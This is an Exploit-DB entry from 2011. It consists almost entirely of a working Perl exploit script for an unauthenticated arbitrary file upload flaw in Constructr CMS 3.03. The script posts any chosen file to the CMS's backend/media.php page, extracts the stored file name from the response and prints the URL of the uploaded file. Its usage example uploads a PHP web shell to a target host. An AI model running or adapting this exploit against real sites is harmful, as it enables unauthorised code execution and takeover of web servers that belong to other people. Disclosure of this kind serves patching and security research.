Constructr CMS 3.03 - Arbitrary File Upload

EDB-ID:

17035

CVE:

N/A


Author:

plucky

Type:

webapps


Platform:

PHP

Date:

2011-03-23


#!/usr/bin/env perl

# Constructr CMS 3.03 Arbitrary File Upload
#
# Author: plucky
# Email:  io.plucky@gmail.com     
#
# Vulnerable Page: /constructr/backend/media.php [line 
# App Download:    http://sourceforge.net/projects/constructr/
#
# Date: 23/03/2011
# THX TO: yawn, shrod, h473 and DoMinO

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common qw( POST );


my $host           = '';
my $file_to_upload = '';
my $new_file_name  = '';
my $file_extension = '';


sub exploit_usage {

    print 'Constructr CMS 3.03 Arbitrary File Upload'                                        . "\n".
          '-------------------------'                                                        . "\n".
          'Author: plucky'                                                                   . "\n".
          'Email:  io.plucky@gmail.com'                                                      . "\n".
          '-------------------------'                                                        . "\n". 
          'Usage:'                                                                           . "\n".
          '        perl xpl.pl [host]/[cms-path]/ /[path-file]/[file]'                       . "\n".
          'Example:'                                                                         . "\n".
          '        perl ' . $0 . ' http://vulnerable.com/constructr/ /home/plucky/shell.php' . "\n";

    exit;

}

sub file_parse {

    my $file_name       = '';
    my $file_extension  = '';
    my $file_to_upload  = '';
    my $rfile_to_upload = '';


    $rfile_to_upload = shift;
    $file_to_upload  = ${$rfile_to_upload};

    $file_to_upload =~ m/\/([a-z0-9]+)\.([a-z]+)/i;

    $file_name      = $1;
    $file_extension = $2;

    return ( $file_name, $file_extension )

}

sub upload_file {

    my $host            = '';
    my $rhost           = '';
    my $file_name       = '';
    my $file_extension  = '';
    my $response        = '';
    my $path            = '';
    my $html            = '';
    my $user_agent      = '';
    my $file_to_upload  = '';
    my $rfile_to_upload = '';
    my $new_file_name   = '';


    ( $rhost, $rfile_to_upload ) = @_;

    $host           = ${$rhost};
    $file_to_upload = ${$rfile_to_upload};

    $user_agent = LWP::UserAgent->new;
    $path       = $host . 'backend/media.php';


    $response = $user_agent->post(
        $path,
        [
            'create_file' => 'try',
            'file'        => [$file_to_upload],
        ],
        'Content_Type' => 'form-data'
    );


    ( $file_name, $file_extension ) = file_parse( \$file_to_upload );


    $html = $response->decoded_content;
    $html =~ m/show_path=([a-f0-9]{32})\.$file_extension">$file_name\.$file_extension<\/a>/i;

    $new_file_name = $1;

    return ( $new_file_name, $file_extension );

}

@ARGV == 2
           ? ( $host, $file_to_upload ) = @ARGV
           : exploit_usage();

( $new_file_name, $file_extension ) = upload_file( \$host, \$file_to_upload );


print $host, 'data/workspace/uploads/', $new_file_name, '.', $file_extension, "\n";